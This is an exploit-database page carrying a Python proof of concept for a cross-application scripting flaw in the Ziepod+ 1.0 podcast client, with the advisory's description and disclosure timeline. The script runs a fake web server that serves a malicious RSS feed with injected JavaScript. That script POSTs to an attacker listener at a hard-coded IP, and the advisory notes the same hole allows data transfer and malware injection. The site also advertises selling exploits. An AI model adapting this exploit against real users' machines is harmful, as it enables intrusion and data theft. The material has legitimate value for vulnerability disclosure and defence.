0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Ziepod+ 1.0 Cross Application Scripting

Author

sinn3r

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

=======================================
Ziepod+ 1.0 Cross Application Scripting
=======================================

#!/usr/bin/python
 
import thread
import socket
 
"""
|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
 
 
Ziepod+ 1.0 Cross Application Scripting
Advisory: CORELAN-10-037
Found and coded by sinn3r  -  x90.sinner{at}gmail{d0t}com
http://twitter.com/_sinn3r
 
Tested Machine:
Windows XP SP3 ENG + IE 7.0
Windows 7 Ultimate + IE 8.0
 
Description:
 
Ziepod/Ziepod+ is vulnerable to cross application scripting when processing an XML subscription.
In order to carry about the attack, the attacker must serve the malicious XML file on a web
server first and trick the user into adding it to the subscription.  Once the XML is automatically
loaded, the JavaScript will execute, the attacker is capable of any of the following depending
on the browser:
 1. Modify the application contents in Ziepod
 2. View/transfer/write data on the victim machine
 3. Inject malware on the victim machine using, for example, an iframe
 
This payload of this script is pretty harmless, it just mimics a "ping"
request using XMLHttpRequest(). When you see the "PING!", that indicates
the remote machine is vulnerable to this attack.
 
Disclosure:
04-20-2010: Vendor contacted
04-28-2010: Reminder sent
05-05-2010: Still no response from vendor, POC released.
 
Demo:
sinn3r@bt:~/sploits# ./ziepod1_0.py
[*] Ziepod+ 1.0 Cross Application Scripting
[*] coded by sinn3r  -  x90.sinner{at}gmail{d0t}com
[*] Waiting for a ping from the Ziepod user at 0.0.0.0:4444
[*] Running web server at 0.0.0.0:80
[*] Fake podcast XML sent
[*] 192.168.3.111 says "PING!"... it is vulnerable.
"""
 
## We put a null byte in front of the tag to prevent it being displayed in some areas
## the isIndex trick isn't the only way to run JavaScript, of course.
## Make sure to modify the destination address
payload = (
"%00%3cscript%3e"
"h=new ActiveXObject('Microsoft.XMLHTTP');h.open('POST', 'http://192.168.3.106:4444',false);h.send('PING!!');"
"%3c/script%3e");
 
## XML template
## The <description> tag isn't the only place to inject code, but you get the point
_xml = """<?xml version="1.0" encoding="utf-8"?>
<rss xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dcterms="http://purl.org/dc/terms/">
  <channel>
    <title>Channel Title</title>
    <link>http://google.com/</link>
    <description>Channel Description</description>
    <language>en-us</language>
    <generator>n0body</generator>
 
    <pubDate>Sat, 17 Apr 2010 00:37:29 GMT</pubDate>
    <itunes:keywords>keyword1,keyword2</itunes:keywords>
    <itunes:subtitle>Channel subtitle.</itunes:subtitle>
    <itunes:owner>
      <itunes:name>Channel Hsowner's name</itunes:name>
      <itunes:email>Channel Is owner's email</itunes:email>
 
    </itunes:owner>
    <itunes:explicit>clean</itunes:explicit>
    <itunes:block>sno</itunes:block>
    <itunes:image href="http://google.com/image.jpg"/>
    <itunes:author>sinn3r</itunes:author>
    <itunes:summary>sinn3r is phat</itunes:summary>
    <itunes:category text="exploit">
 
      <itunes:category text="exploit"/>
    </itunes:category>
    <atom:link href="http://www.google.com/rss2.xml" type="application/rss+xml" rel="self"/>
    <item>
      <title>This is a podcast, really</title>
      <description>This is a podcast that doesn't do anything, really.%s</description>
      <guid isPermaLink="true">http://www.google.com</guid>
 
      <comments>No comment</comments>
      <pubDate>Sat, 17 Apr 2010 00:28:17 GMT</pubDate>
      <dcterms:modified>2010-17</dcterms:modified>
      <dcterms:created>2010-04-17</dcterms:created>
      <link>http://www.google.com</link>
      <dc:creator>podcast creator</dc:creator>
 
      <itunes:keywords>podcast1_keyword1</itunes:keywords>
      <enclosure url="http://www.google.com/s.mp3" type="audio/mpeg" length="3214628"/>
      <itunes:image href="http://someurl/s.jpg"/>
      <itunes:duration>267</itunes:duration>
      <itunes:explicit>clean</itunes:explicit>
      <itunes:summary>s</itunes:summary>
    </item>
  </channel>
</rss>
 
""" %payload
 
## Listen for the payload's "ping" at port 4444
def runReceiver():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", 4444))
    s.listen(1)
    print "[*] Waiting for a ping from the Ziepod user at 0.0.0.0:4444"
    while 1:
        c, addr = s.accept()
        #print "[*] Remote user %s says:" %addr[0],
        while 1:
            data = c.recv(1024)
            if not data or data.find("PING!!") >= 0:
                print "[*] %s says \"PING!\"... it is vulnerable." %addr[0]
                break
        c.close()
 
## Fake a web server so we can serve the app with fake podcasts.
def runServer():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", 80))
    s.listen(1)
    print "[*] Running web server at 0.0.0.0:80"
    while 1:
        c, addr = s.accept()
        c.send(_xml)
        print "[*] Fake podcast XML sent"
        c.close()
 
if __name__ == "__main__":
    print "[*] Ziepod+ 1.0 Cross Application Scripting"
    print "[*] coded by sinn3r  -  x90.sinner{at}gmail{d0t}com"
    thread.start_new_thread(runReceiver, ())
    runServer()



#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Ziepod+ 1.0 Cross Application Scripting

Report Error

Report Error